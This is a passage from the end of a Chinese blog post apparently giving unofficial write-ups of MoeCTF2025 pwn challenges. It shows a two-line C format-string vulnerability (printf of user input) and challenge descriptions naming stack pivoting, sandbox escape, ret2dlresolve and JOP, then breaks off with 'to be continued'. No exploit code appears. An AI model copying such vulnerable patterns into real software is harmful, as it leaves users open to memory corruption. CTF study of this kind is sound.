<p>fmt竟离开了栈，我能依赖的，也许只有栈上现有的指针了？</p>
</blockquote>
<h2 id="fmt-T"><a href="#fmt-T" class="headerlink" title="fmt_T"></a>fmt_T</h2><blockquote>
<p>越来越热 • “深入洞穴探险，到达熔火地狱。”</p>
</blockquote>
<p>开启了栈保护。<br><div class="code-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">fgets(s, <span class="number">6</span>, <span class="built_in">stdin</span>);</span><br><span class="line"><span class="built_in">printf</span>(s);</span><br></pre></td></tr></table></figure></div><br>明显的格式化字符串漏洞，</p>
<h2 id="hardpivot"><a href="#hardpivot" class="headerlink" title="hardpivot"></a>hardpivot</h2><blockquote>
<p>一次的栈迁移似乎不够用了，你要怎样才能再次迁移呢？如何布局栈才能拿到这一题的 flag 呢？这一次，你需要把前面的知识融会贯通，才能在这一题成功。加油！</p>
</blockquote>
<h2 id="shellbox"><a href="#shellbox" class="headerlink" title="shellbox"></a>shellbox</h2><blockquote>
<p>沙箱保护、静态链接…I have an idea.</p>
</blockquote>
<h2 id="No-way-to-leak"><a href="#No-way-to-leak" class="headerlink" title="No way to leak!"></a>No way to leak!</h2><blockquote>
<p>有些时候，明明随便劫持程序控制流程，但是你却怎么也泄露不出什么东西，只能干着急，这时候，不如试着去了解一下ret2dlresolve这个技术吧，拿到这题的flag，不该成为你的目的，你的目的应该是，在做这个题的过程中，跟着GDB，再重新了解一下动态链接，仔细的跟踪一下它究竟是怎么解析出符号的（并不是像前面的ret2libc一样，只浅浅的了解，不妨跟踪一下从_dl_runtime_resolve函数开始的解析过程），相信你会受益匪浅！</p>
</blockquote>
<h2 id="call-it"><a href="#call-it" class="headerlink" title="call it"></a>call it</h2><blockquote>
<p> 省流：JOP 攻击</p>
</blockquote>
<p><em>to be continued…</em></p>

		</div>

		
		<div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
			<div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> MoeCTF2025(PWN)非官方个人题解</li>
        <li><strong>Author:</strong> sadsnowcat</li>
        <li><strong>Created at
                :</strong> 2026-01-26 12:00:00</li>
        
            <li>
                <strong>Updated at
                    :</strong> 2026-03-14 10:45:30
            </li>
        
        <li>
            <strong>Link:</strong> https://sadsnowcat.github.io/2026/01/26/moectf2025/
        </li>
        <li>
            <strong>
                License:
            </strong>
            

            
                This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a>.
            
        </li>
    </ul>
</div>

		</div>
		

		
		<ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
			
			<li class="tag-item mx-0.5">
				<a href="/tags/Write-Up/">#Write Up</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/PWN/">#PWN</a>&nbsp;
			</li>
			
		</ul>
		

		

		
		<div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
			
			<div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="prev" rel="prev" href="/2026/02/17/buuoj/">
					<span class="left arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-left"></i>
					</span>
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item truncate max-w-48">buu历险记</span>
						<span class="post-nav-item">Prev posts</span>
					</span>
				</a>
			</div>
			
			
			<div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="next" rel="next" href="/2026/01/16/helloword/">
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item truncate max-w-48">Hello World!</span>
						<span class="post-nav-item">Next posts</span>
					</span>
					<span class="right arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-right"></i>
					</span>
				</a>
			</div>
			
		</div>
		


		
		<div class="comment-container px-2 sm:px-6 md:px-8 pb-8">
			<div class="comments-container mt-10 w-full ">
    <div id="comment-anchor" class="w-full h-2.5"></div>
    <div class="comment-area-title w-full my-1.5 md:my-2.5 text-xl md:text-3xl font-bold">
        Comments
    </div>
    

        
            
    <div id="waline"></div>
    <script type="module" data-swup-reload-script>
      import { init } from '/js/libs/waline.js';

      (function() {
        const startPath = location.pathname;
        const startTime = Date.now();
        const retryDelay = 200;
        const retryLimit = 5000;

        const runWaline = () => {
          if (location.pathname !== startPath) {
            return;
          }

          const container = document.getElementById('waline');
          if (!container) {
            if (Date.now() - startTime < retryLimit) {
              setTimeout(runWaline, retryDelay);
            }
            return;
          }

          if (window.redefineWalineInstance?.destroy) {
            window.redefineWalineInstance.destroy();
          }

          container.innerHTML = '';
          window.redefineWalineInstance = init({
            el: '#waline',
            serverURL: 'https://example.example.com',
            path: location.pathname,
            dark: 'body[class~="dark-mode"]',
            reaction: false,
            requiredMeta: ['nick', 'mail'],
            emoji: [],
                      lang: 'zh-CN',
          });
        };

        runWaline();
      })();
    </script>



        
    
</div>

		</div>
		
	</div>

	
	<div class="toc-content-container">
		<div class="post-toc-wrap">
	<div class="post-toc">
		<div class="toc-title">On this page</div>
		<div class="page-title">MoeCTF2025(PWN)非官方个人题解</div>
		<ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link"><span class="nav-text">#</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#EZtext"><span class="nav-text">EZtext</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ezshellcode"><span class="nav-text">ezshellcode</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%AE%A4%E8%AF%86libc"><span class="nav-text">认识libc</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#str-check"><span class="nav-text">str_check</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#xdulake"><span class="nav-text">xdulake</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#boom"><span class="nav-text">boom</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#boom-revenge"><span class="nav-text">boom_revenge</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ezlibc"><span class="nav-text">ezlibc</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#inject"><span class="nav-text">inject</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#randomlock"><span class="nav-text">randomlock</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#syslock"><span class="nav-text">syslock</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ezprotection"><span class="nav-text">ezprotection</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ezpivot"><span class="nav-text">ezpivot</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#fmt-S"><span class="nav-text">fmt_S</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#fmt-T"><span class="nav-text">fmt_T</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#hardpivot"><span class="nav-text">hardpivot</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#shellbox"><span class="nav-text">shellbox</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#No-way-to-leak"><span class="nav-text">No way to leak!</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#call-it"><span class="nav-text">call it</span></a></li></ol></li></ol>

	</div>
</div>
	</div>
	
</div>

			</div>

			
		</div>

		<div class="main-content-footer">
			<footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2026</span>
              -
            
            2026&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">sadsnowcat</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        4 posts in total
                    </span>
                    
                </p>
            
        </div>
        
            <script data-swup-reload-script src="https://cn.vercount.one/js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">VISITOR COUNT</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">TOTAL PAGE VIEWS</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.9.0</a></span>
        </div>
        
        
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
		</div>
	</div>

	
	<div class="post-tools">
		<div class="post-tools-container">
	<ul class="article-tools-list">
		<!-- TOC aside toggle -->
		
		<li class="right-bottom-tools page-aside-toggle">
			<i class="fa-regular fa-outdent"></i>
		</li>
		

		<!-- go comment -->
		
		<li class="go-comment">
			<i class="fa-regular fa-comments"></i>
		</li>
		
	</ul>
</div>
	</div>
	

	<div class="right-side-tools-container">
		<div class="side-tools-container">
	<ul class="hidden-tools-list">
		<li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-plus"></i>
		</li>

		<li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-minus"></i>
		</li>

		<li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
			<i class="fa-regular fa-moon"></i>
		</li>

		<!-- rss -->
		

		

		<li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
			<i class="fa-regular fa-arrow-down"></i>
		</li>
	</ul>

	<ul class="visible-tools-list">
		<li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
			<i class="fa-regular fa-cog fa-spin"></i>
		</li>
		
		<li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
			<i class="arrow-up fas fa-arrow-up"></i>
			<span class="percent"></span>
		</li>
		
		
	</ul>
</div>
	</div>

	<div class="image-viewer-container" role="dialog" aria-modal="true" aria-label="Image viewer">
	<button class="image-viewer-close" type="button" aria-label="Close">
		<i class="fa-solid fa-xmark"></i>
	</button>
	<button class="image-viewer-prev" type="button" aria-label="Prev">
		<i class="fa-solid fa-chevron-left"></i>
	</button>
	<div class="image-viewer-frame">
		<img src="" alt="">
	</div>
	<div class="image-viewer-exif-panel hidden absolute left-1/2 bottom-20 -translate-x-1/2 w-[min(92vw,420px)] max-h-[60vh] overflow-hidden rounded-2xl bg-background-color-transparent-80 p-4 text-left shadow-redefine-flat backdrop-blur-md" role="dialog" aria-label="EXIF" aria-hidden="true">
		<div class="flex items-center justify-between mb-3">
			<span class="text-sm font-semibold text-first-text-color">EXIF</span>
			<button class="image-viewer-exif-close flex h-8 w-8 items-center justify-center rounded-full bg-background-color-transparent-80 text-first-text-color transition hover:bg-background-color-transparent-40" type="button" aria-label="Close">
				<i class="fa-solid fa-xmark text-[0.65rem]"></i>
			</button>
		</div>
		<div class="image-viewer-exif-cards grid grid-cols-1 sm:grid-cols-2 gap-3 max-h-[50vh] overflow-y-auto pr-1 scrollbar-hide"></div>
		<template class="image-viewer-exif-card-template">
			<div class="rounded-lg bg-background-color-transparent-40 px-3 py-2">
				<div class="image-viewer-exif-card-header flex items-center gap-2 mb-1">
					<i class="image-viewer-exif-card-icon fa-solid fa-circle-info text-xs text-third-text-color"></i>
					<div class="image-viewer-exif-card-title text-xs font-semibold text-first-text-color"></div>
				</div>
				<div class="image-viewer-exif-card-items flex flex-col gap-1"></div>
			</div>
		</template>
	</div>
	<button class="image-viewer-exif-toggle flex items-center gap-2 hidden absolute left-1/2 bottom-6 -translate-x-1/2 rounded-full border border-border-color bg-background-color-transparent-80 px-4 py-2 text-first-text-color backdrop-blur-md transition hover:bg-background-color-transparent-40" type="button" aria-label="EXIF" aria-expanded="false">
		<i class="fa-solid fa-circle-info text-xs"></i>
		<span class="text-xs font-semibold uppercase tracking-wider">EXIF</span>
	</button>
	<button class="image-viewer-next" type="button" aria-label="Next">
		<i class="fa-solid fa-chevron-right"></i>
	</button>
</div>


	
	<div class="search-pop-overlay">
	<div class="popup search-popup">
		<div class="search-header">
			<span class="search-input-field-pre">
				<i class="fa-solid fa-keyboard"></i>
			</span>
			<div class="search-input-container">
				<input autocomplete="off" autocorrect="off" autocapitalize="off" placeholder="Search..." spellcheck="false" type="search" class="search-input">
			</div>
			<span class="popup-btn-close">
				<i class="fa-solid fa-times"></i>
			</span>
		</div>
		<div id="search-result">
			<div id="no-result">
				<i class="fa-solid fa-spinner fa-spin-pulse fa-5x fa-fw"></i>
			</div>
		</div>
	</div>
</div>
	

</main>


<script  src="https://registry.npmmirror.com/hexo-theme-redefine/2.9.0/files/source/js/build/libs/Swup.min.js" ></script><script  src="https://registry.npmmirror.com/hexo-theme-redefine/2.9.0/files/source/js/build/libs/SwupSlideTheme.min.js" ></script><script  src="https://registry.npmmirror.com/hexo-theme-redefine/2.9.0/files/source/js/build/libs/SwupScriptsPlugin.min.js" ></script><script  src="https://registry.npmmirror.com/hexo-theme-redefine/2.9.0/files/source/js/build/libs/SwupProgressPlugin.min.js" ></script><script  src="https://registry.npmmirror.com/hexo-theme-redefine/2.9.0/files/source/js/build/libs/SwupScrollPlugin.min.js" ></script><script  src="https://registry.npmmirror.com/hexo-theme-redefine/2.9.0/files/source/js/build/libs/SwupPreloadPlugin.min.js" ></script>
<script>
    window.swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });

    window.dispatchEvent(
        new CustomEvent("redefine:swup:ready", {
            detail: {
                swup: window.swup,
            },
        }),
    );
</script>




	<script type="module" src="https://registry.npmmirror.com/hexo-theme-redefine/2.9.0/files/source/js/build/main.js" ></script>


    <script  src="https://registry.npmmirror.com/hexo-theme-redefine/2.9.0/files/source/js/build/libs/odometer.min.js" ></script>
    <link rel="stylesheet" href="https://registry.npmmirror.com/hexo-theme-redefine/2.9.0/files/source/assets/odometer-theme-minimal.css">






  <script  src="https://registry.npmmirror.com/hexo-theme-redefine/2.9.0/files/source/js/build/libs/Typed.min.js" ></script>








<script  src="https://registry.npmmirror.com/hexo-theme-redefine/2.9.0/files/source/js/build/libs/moment-with-locales.min.js" data-swup-reload-script></script>


	
</body>

</html>